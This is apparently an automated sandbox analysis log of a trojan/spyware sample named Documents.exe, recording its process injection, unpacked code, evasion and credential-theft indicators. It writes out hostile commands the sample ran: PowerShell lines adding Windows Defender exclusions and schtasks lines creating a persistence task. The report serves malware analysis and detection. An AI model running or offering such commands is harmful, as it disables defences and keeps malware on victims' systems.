                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01522F60 NtCreateProcessEx,9_2_01522F60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01522F30 NtCreateSection,9_2_01522F30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01522FE0 NtCreateFile,9_2_01522FE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01522F90 NtProtectVirtualMemory,9_2_01522F90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01522FB0 NtResumeThread,9_2_01522FB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01522FA0 NtQuerySection,9_2_01522FA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01522E30 NtWriteVirtualMemory,9_2_01522E30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01522EE0 NtQueueApcThread,9_2_01522EE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01522E80 NtReadVirtualMemory,9_2_01522E80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01522EA0 NtAdjustPrivilegesToken,9_2_01522EA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01523010 NtOpenDirectoryObject,9_2_01523010
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01523090 NtSetValueKey,9_2_01523090
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_015239B0 NtGetContextThread,9_2_015239B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01523D70 NtOpenThread,9_2_01523D70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01523D10 NtOpenProcessToken,9_2_01523D10
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 0119EA12 appears 36 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 01537E54 appears 102 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 0155EA12 appears 86 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 01177E54 appears 97 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 01525130 appears 58 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 014DB970 appears 280 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 0156F290 appears 105 times
                    Source: Documents.exe Static PE information: invalid certificate
                    Source: Documents.exe, 00000000.00000002.2156644192.0000000004359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs Documents.exe
                    Source: Documents.exe, 00000000.00000002.2160027953.0000000005BD0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs Documents.exe
                    Source: Documents.exe, 00000000.00000002.2163169928.00000000078D0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs Documents.exe
                    Source: Documents.exe, 00000000.00000002.2156644192.0000000004372000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs Documents.exe
                    Source: Documents.exe, 00000000.00000002.2147309515.00000000013BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Documents.exe
                    Source: Documents.exe Binary or memory string: OriginalFilenameXiBt.exe: vs Documents.exe
                    Source: Documents.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: Documents.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: uFEeKIucsX.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, iavCtQFueCRVgf9V4b.cs Security API names: _0020.SetAccessControl
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, iavCtQFueCRVgf9V4b.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, iavCtQFueCRVgf9V4b.cs Security API names: _0020.AddAccessRule
                    Source: 0.2.Documents.exe.4406868.1.raw.unpack, iavCtQFueCRVgf9V4b.cs Security API names: _0020.SetAccessControl
                    Source: 0.2.Documents.exe.4406868.1.raw.unpack, iavCtQFueCRVgf9V4b.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Documents.exe.4406868.1.raw.unpack, iavCtQFueCRVgf9V4b.cs Security API names: _0020.AddAccessRule
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, OANgdeAkH9yusRxXWr.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Documents.exe.4406868.1.raw.unpack, OANgdeAkH9yusRxXWr.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@23/16@14/13
                    Source: C:\Users\user\Desktop\Documents.exe File created: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6972:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5356:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2000:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe Mutant created: \Sessions\1\BaseNamedObjects\IKdbVkUUpHft
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:320:120:WilError_03
                    Source: C:\Users\user\Desktop\Documents.exe File created: C:\Users\user\AppData\Local\Temp\tmp2505.tmp
                    Source: Documents.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Documents.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Users\user\Desktop\Documents.exeFile read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\Documents.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: systray.exe, 00000011.00000002.4498880450.000000000074C000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000011.00000002.4498880450.0000000000742000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000011.00000003.2523917187.0000000000742000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000011.00000003.2523806347.0000000000721000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000011.00000002.4498880450.000000000076D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: Documents.exeReversingLabs: Detection: 23%
                    Source: C:\Users\user\Desktop\Documents.exeFile read: C:\Users\user\Desktop\Documents.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\Documents.exe "C:\Users\user\Desktop\Documents.exe"
                    Source: C:\Users\user\Desktop\Documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uFEeKIucsX.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Documents.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp2505.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Documents.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe C:\Users\user\AppData\Roaming\uFEeKIucsX.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp4E47.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeProcess created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"
                    Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                    Source: C:\Users\user\Desktop\Documents.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\Documents.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Windows\SysWOW64\systray.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                    Source: Documents.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Documents.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: systray.pdb source: RegSvcs.exe, 00000009.00000002.2340231400.0000000001058000.00000004.00000020.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000010.00000002.4499291759.0000000000B18000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: systray.pdbGCTL source: RegSvcs.exe, 00000009.00000002.2340231400.0000000001058000.00000004.00000020.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000010.00000002.4499291759.0000000000B18000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vWFGbvOdxI.exe, 00000010.00000002.4499807449.0000000000E2E000.00000002.00000001.01000000.0000000D.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4499818518.0000000000E2E000.00000002.00000001.01000000.0000000D.sdmp
                    Source: Binary string: RegSvcs.pdb, source: systray.exe, 00000011.00000002.4498880450.00000000006C2000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000011.00000002.4500910385.0000000004B3C000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000002C8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2632346908.0000000030C3C000.00000004.80000000.00040000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000011.00000002.4500442013.0000000004510000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000011.00000003.2341815008.000000000435E000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000011.00000003.2340058980.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000011.00000002.4500442013.00000000046AE000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000011.00000002.4500442013.0000000004510000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000011.00000003.2341815008.000000000435E000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000011.00000003.2340058980.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000011.00000002.4500442013.00000000046AE000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: RegSvcs.pdb source: systray.exe, 00000011.00000002.4498880450.00000000006C2000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000011.00000002.4500910385.0000000004B3C000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000002C8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2632346908.0000000030C3C000.00000004.80000000.00040000.00000000.sdmp

                    Data Obfuscation

                    Source: 0.2.Documents.exe.5bd0000.3.raw.unpack, kAOj1Y7pfP90kycNNw.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, iavCtQFueCRVgf9V4b.cs.Net Code: imDpH89lry System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Documents.exe.5bd0000.3.raw.unpack, GtaAIbrHXObmMm8GPA.cs.Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Documents.exe.4406868.1.raw.unpack, iavCtQFueCRVgf9V4b.cs.Net Code: imDpH89lry System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\Documents.exeCode function: 0_2_05F1A739 push A805B45Eh; iretd 0_2_05F1A745
                    Source: C:\Users\user\Desktop\Documents.exeCode function: 0_2_05F1A65F pushfd ; iretd 0_2_05F1A66D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004071DE push 6FB25C47h; retf 9_2_004071E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004031B0 push eax; ret 9_2_004031B2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0040B9B7 push ebp; retf 9_2_0040B9BE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004172E9 push dword ptr [esi+eax*2+5Fh]; retf 9_2_004172F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004133E3 push ss; retn A658h9_2_0041350B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00414BF2 push edi; ret 9_2_00414C12
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00414C28 push edi; ret 9_2_00414C12
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00418D95 pushfd ; retf 9_2_00418DAD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00415661 push edx; iretd 9_2_00415662
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E09AD push ecx; mov dword ptr [esp], ecx9_2_014E09B6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0116C54F push 8B010F67h; ret 15_2_0116C554
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0116C54D pushfd ; ret 15_2_0116C54E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_011209AD push ecx; mov dword ptr [esp], ecx15_2_011209B6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0116C9D7 push edi; ret 15_2_0116C9D9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_010F1368 push eax; iretd 15_2_010F1369
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_010F1FEC push eax; iretd 15_2_010F1FED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01177E99 push ecx; ret 15_2_01177EAC
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeCode function: 16_2_029EE26A push eax; iretd 16_2_029EE26B
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeCode function: 16_2_029ED8FA push edx; iretd 16_2_029ED8FB
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeCode function: 16_2_029F102E pushfd ; retf 16_2_029F1046
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeCode function: 16_2_029F0870 push eax; iretd 16_2_029F0871
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeCode function: 16_2_029ECE8B push edi; ret 16_2_029ECEAB
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeCode function: 16_2_029ECEC1 push edi; ret 16_2_029ECEAB
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeCode function: 16_2_029E3C50 push ebp; retf 16_2_029E3C57
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeCode function: 16_2_029DF477 push 6FB25C47h; retf 16_2_029DF481
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeCode function: 16_2_029EF582 push dword ptr [esi+eax*2+5Fh]; retf 16_2_029EF591
                    Source: Documents.exeStatic PE information: section name: .text entropy: 7.844297233774946
                    Source: uFEeKIucsX.exe.0.drStatic PE information: section name: .text entropy: 7.844297233774946
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, Gf3UqQuHQKmNjVRHiT.csHigh entropy of concatenated method names: 'qTMnJth4oW', 'wGCnjd67G8', 'kuFnAsIvnR', 'Tc3nunlJyT', 'g9dnxCpktS', 'HCXn0mwo3k', 'rkOn1JxGFe', 'rxhnYBq2Iu', 'Ic4nlx2nZL', 'zKFncfTDkZ'
                    Source: C:\Users\user\Desktop\Documents.exeFile created: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe

                    Boot Survival

                    Source: C:\Users\user\Desktop\Documents.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp2505.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara matchFile source: Process Memory Space: Documents.exe PID: 6392, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: uFEeKIucsX.exe PID: 1848, type: MEMORYSTR
                    Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                    Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                    Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                    Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                    Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                    Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                    Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                    Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                    Source: C:\Users\user\Desktop\Documents.exe Memory allocated: 3100000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Documents.exe Memory allocated: 3330000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Documents.exe Memory allocated: 3150000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Documents.exe Memory allocated: 9900000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Documents.exe Memory allocated: 7AA0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Documents.exe Memory allocated: A900000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Documents.exe Memory allocated: B900000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe Memory allocated: 2700000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe Memory allocated: 28A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe Memory allocated: 48A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe Memory allocated: 8B10000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe Memory allocated: 9B10000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe Memory allocated: 9D20000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe Memory allocated: AD20000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0152096E rdtsc 9_2_0152096E
                    Source: C:\Users\user\Desktop\Documents.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4843
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3992
                    Source: C:\Windows\SysWOW64\systray.exeWindow / User API: threadDelayed 9833
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.7 %
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.2 %
                    Source: C:\Users\user\Desktop\Documents.exe TID: 5692 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3136 Thread sleep count: 4843 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2804 Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1248 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6532 Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5248 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe TID: 3652 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\systray.exe TID: 5160Thread sleep count: 139 > 30
                    Source: C:\Windows\SysWOW64\systray.exe TID: 5160Thread sleep time: -278000s >= -30000s
                    Source: C:\Windows\SysWOW64\systray.exe TID: 5160Thread sleep count: 9833 > 30
                    Source: C:\Windows\SysWOW64\systray.exe TID: 5160Thread sleep time: -19666000s >= -30000s
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe TID: 6512Thread sleep time: -65000s >= -30000s
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe TID: 6512Thread sleep count: 37 > 30
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe TID: 6512Thread sleep time: -55500s >= -30000s
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe TID: 6512Thread sleep count: 36 > 30
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe TID: 6512Thread sleep time: -36000s >= -30000s
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
                    Source: H846yjBj.17.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: H846yjBj.17.drBinary or memory string: discord.comVMware20,11696428655f
                    Source: H846yjBj.17.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: H846yjBj.17.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: H846yjBj.17.drBinary or memory string: global block list test formVMware20,11696428655
                    Source: H846yjBj.17.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
